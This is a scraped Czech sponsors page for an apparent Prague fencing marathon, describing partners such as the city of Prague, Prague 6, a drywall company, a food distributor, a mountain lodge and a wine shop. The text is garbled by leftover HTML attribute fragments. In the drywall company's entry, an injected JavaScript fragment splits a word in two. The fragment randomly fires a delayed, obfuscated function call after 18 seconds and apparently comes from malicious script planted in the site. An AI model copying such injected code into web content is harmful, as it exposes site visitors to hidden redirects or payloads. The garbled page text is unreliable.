Partners

Many thanks to all our partners

Praha“ src=“http://www.fencingmarathon.cz/_ftp/loga/praha_eu_big.png“ alt=“PRAHA“ width=“180″ height=“120″ /> p“>Praha je hlavním městem České republiky a 14. největším městem Evropské unie. Do dnešní podoby se Praha vyvíjela jedenáct století. V současnosti se rozkládá na území 496 čtverečních kilometrů a má přes 1,2 milionu obyvatel.

Praha je všeobecně považována za jedno z nejkrásnějších měst v Evropě. Historické centrum města s jedinečným panoramatem Pražského hradu, největšího hradního komplexu na světě, je památkovou rezervací UNESCO.

Partnerství hl. m. Prahy v oblasti kultury, cestovního ruchu, sportu, volného času a volného času dětí a mládeže je nástrojem podpory akcí, které pořádají subjekty působící v Praze v uvedených oblastech, a mezinárodních a tematicky prioritních akcí v uvedených oblastech.

Praha“ href=“http://www.praha.eu“ target=“_blank“ rel=“noopener noreferrer“>www.praha.eu

Praha 6 p“>Největší pražská městská část Praha 6 zahrnuje katastrální území Ruzyně, Liboc, Veleslavín, Vokovice, Dejvice, Střešovice a části katastrálních území Břevnov, Sedlec, Bubeneč a Hradčany. Patří mezi obvody převážně obytného a rekreačního charakteru, nalezneme zde řadu divadel, vysokých i středních škol.

Typické pro Prahu 6 je bohatost a rozmanitost její přírody. Mezi nejvíce navštěvovaná místa patří Divoká Šárka, Kozí hřbety a Sedlecké skály.

Přestože se většina jejího území stala součástí hlavního města až v roce 1920, patří Praha 6 mezi nejžádanější lokality pro bydlení, administrativu i diplomatická a obchodní zastoupení.

www.praha6.cz

ŠermCZ p“>ŠermCZ je oficiálním prodejcem šermířského vybavení PBT Hungary pro Českou republiku.
www.sermcz.cz

ny“ src=“http://www.fencingmarathon.cz/_ftp/loga/cernysdk_cz_big.png“ alt=“Černý a Černý“ width=“180″ height=“120″ /> p“>Hlavní činností stavební firmy Černý a Černý Sádrokartony spol. s r.o. je dodávka a montáž suchých staveb, sádrokartonových konstrukcí, minerálních podhledů, akustických podhledů a obkladů, zateplování podkroví a to v reprezentativní kvalitě se standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardní zárukou na provedené práce 36 měsíců.

Firma vznikla v roce 1990 původně jako sdružení fyzických osob. V roce 1996 byla založena společnost s ručením omezeným.

ny“ href=“http://www.cernysdk.cz“ target=“_blank“ rel=“noopener noreferrer“>www.cernysdk.cz

MP Lahůdky p“>Společnost MP Lahůdky s.r.o. se zabývá distribucí chlazených tuzemských i zahraničních potravin, především sýrů a uzenin. Zaměřuje se na segment volného trhu a tuzemských regionálních prodejen a velkoobchod.
www.mplahudky.cz

uš“ src=“http://www.fencingmarathon.cz/_ftp/loga/friesovy-boudy_cz_big.png“ alt=“Friesovy boudy – Matouš“ width=“180″ height=“120″ /> p“>Friesovy boudy se nacházejí v nadmořské výšce 1200 m ve střední části Krkonoš mezi středisky Špindlerův Mlýn a Pec pod Sněžkou. Horské chaty leží mimo hlavní turistická centra, proto poskytují klidné prostředí pro aktivní odpočinek a relaxaci, nebo perfektní podmínky pro sportovní soustředění.

Bouda Mato nabízí pobyt v turistické třídě s lůžkovou kapacitou 15 lůžek. V areálu střediska se nachází 800 m dlouhý lyžařský vlek s převýšením 127 m s obtížností modré barvy. V zimní sezóně Friesovy boudy protíná Krkonošská lyžařská cesta, která vede krkonošskými hřebeny v délce 90,5 km a je neustále upravována rolbami.

uš“ href=“http://www.friesovy-boudy.cz“ target=“_blank“ rel=“noopener noreferrer“>www.friesovy-boudy.cz

Dobré vinařství p“>Máme rádi dobré víno a své vinaře, kteří své práci rozumí, ctí tradice a mají šikovné ruce. Proto se nebojíme nabízet výsledky jejich poctivé práce. Je to pro nás radost – tahle vína totiž pijeme i my a moc nám chutnají.

Dobré vinařství ve svém e-shopu nabízí výběr kvalitních červených, bílých a růžových tichých vín z Velkopavlovické podoblasti včetně vín oceněných v národních a mezinárodních vinařských soutěžích.

www.dobrevinarstvi.cz

Děkujeme!